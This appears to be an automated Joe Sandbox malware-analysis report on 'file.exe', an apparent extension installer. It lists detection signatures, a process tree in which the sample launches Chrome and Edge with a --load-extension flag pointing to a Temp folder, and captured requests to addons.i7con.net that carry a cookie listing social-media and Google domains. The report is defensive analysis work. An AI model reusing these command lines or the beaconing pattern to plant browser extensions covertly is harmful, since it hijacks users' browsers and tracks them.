Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1424925
MD5:c111771f5d635783ec7d12a6852102ec
SHA1:f98ef48a250f20211f951721f46e4c63b6f069fe
SHA256:caaab928c6a53c94ee50f4156530e461680f21f70ec9358aa8bb174edf6edc4c
Tags:exe
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
Installs a Chrome extension
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Chromium Browser Instance Executed With Custom Extension
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C111771F5D635783EC7D12A6852102EC)
    • chrome.exe (PID: 2472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=1996,i,9500446776372737509,2397503758829170713,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • msedge.exe (PID: 4456 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7352 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2096,i,15131329549635077134,11968698142116622703,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 7820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6096 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 9172 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7000 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 9196 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7036 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5700 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7024 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Chromium Browser Instance Executed With Custom Extension
Source: Process startedAuthor: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension", CommandLine|base64offset|contains: , Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4672, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension", ProcessId: 2472, ProcessName: chrome.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: file.exeVirustotal: Detection: 13%Perma Link
Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.5:49798 version: TLS 1.0
Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.24.81:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.24.82:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\weckb\source\repos\Extension Installer\Extension Installer\obj\x64\Release\Extension Installer.pdb source: file.exe
Source: Joe Sandbox ViewIP Address: 152.195.19.97 152.195.19.97
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 23.40.179.37 23.40.179.37
Source: Joe Sandbox ViewIP Address: 40.71.99.188 40.71.99.188
Source: Joe Sandbox ViewIP Address: 13.107.213.40 13.107.213.40
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.5:49798 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.24.81
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.24.81
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.24.81
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.213.40
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ext/analytic?do=init&from=Chrome1 HTTP/1.1Host: addons.i7con.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /crx/blobs/AfQPRnlnN3Mw8JIDvDD8lN9JQMGrnMry7wIOvVHOXgBo8BiA4Tc8VkbwTJGYjci0916e7uqSj344p5MqtR4g76CAefLNLtk5vSAF3_GUbh6fLcZenrmAAMZSmuUkzxMqWGdyV0Tn8REW3yyr1cG7Ag/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_75_4_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ext/installed?1=1&from=Chrome1 HTTP/1.1Host: addons.i7con.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ext/installed?1=1&from=Chrome1 HTTP/1.1Host: addons.i7con.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ext/analytic?do=init&from=Chrome1 HTTP/1.1Host: addons.i7con.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ext/antlog?1=1&from=Chrome1 HTTP/1.1Host: addons.i7con.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: gxid=6618dd2fd6255; installed=true; clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com
Source: global trafficHTTP traffic detected: GET /ext/antlog?1=1&from=Chrome1 HTTP/1.1Host: addons.i7con.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: installed=true; gxid=6618dd2fd6255; clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Cxs3NSu92DAgRPg&MD=sCpdzsBH HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1713510890&P2=404&P3=2&P4=YhgVB9LkuWwwCaoX6hAmYrOfdA4yth62Ox%2fL6caRDWHMIx6wArjubY66%2fic%2f7RYLngixARDaWjjjMvWcoRyf8g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: 4ZbNTCvzlx2U275NQ3skumSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Cxs3NSu92DAgRPg&MD=sCpdzsBH HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: 000003.log2.7.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log2.7.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log2.7.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: unknownDNS traffic detected: queries for: www.google.com
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: file.exe, 00000000.00000002.2094473728.0000020100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.2094473728.0000020100072000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094473728.000002010005E000.00000004.00000800.00020000.00000000.sdmp, manifest.json.0.drString found in binary or memory: http://www.google.com/
Source: file.exe, 00000000.00000002.2094473728.0000020100072000.00000004.00000800.00020000.00000000.sdmp, background.js.0.dr, 2cc80dabc69f58b6_0.7.drString found in binary or memory: http://www.gzip.org/zlib/rfc-gzip.html
Source: file.exe, 00000000.00000002.2094473728.0000020100072000.00000004.00000800.00020000.00000000.sdmp, 2cc80dabc69f58b6_1.7.dr, background.js.0.dr, 2cc80dabc69f58b6_0.7.drString found in binary or memory: https://addons.i7con.net
Source: Reporting and NEL.8.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: Web Data.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Web Data.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json0.7.drString found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json0.7.drString found in binary or memory: https://chromewebstore.google.com/
Source: 16324bac-1af0-430c-9688-7b1e7b63030e.tmp.8.drString found in binary or memory: https://clients2.google.com
Source: manifest.json.7.drString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 16324bac-1af0-430c-9688-7b1e7b63030e.tmp.8.drString found in binary or memory: https://clients2.googleusercontent.com
Source: Reporting and NEL.8.drString found in binary or memory: https://deff.nelreports.net/api/report
Source: Reporting and NEL.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json.7.drString found in binary or memory: https://docs.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json.7.drString found in binary or memory: https://drive.google.com/
Source: Web Data.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 16324bac-1af0-430c-9688-7b1e7b63030e.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.log2.7.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log2.7.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log10.7.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=
Source: 000003.log2.7.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?sv=2017-07-29&
Source: 000003.log2.7.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: 000003.log4.7.drString found in binary or memory: https://ntp.msn.com/
Source: Session_13357379681647682.7.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.7.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.7.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.7.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: content_new.js.7.dr, content.js.7.drString found in binary or memory: https://www.google.com/chrome
Source: Web Data.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 16324bac-1af0-430c-9688-7b1e7b63030e.tmp.8.drString found in binary or memory: https://www.googleapis.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
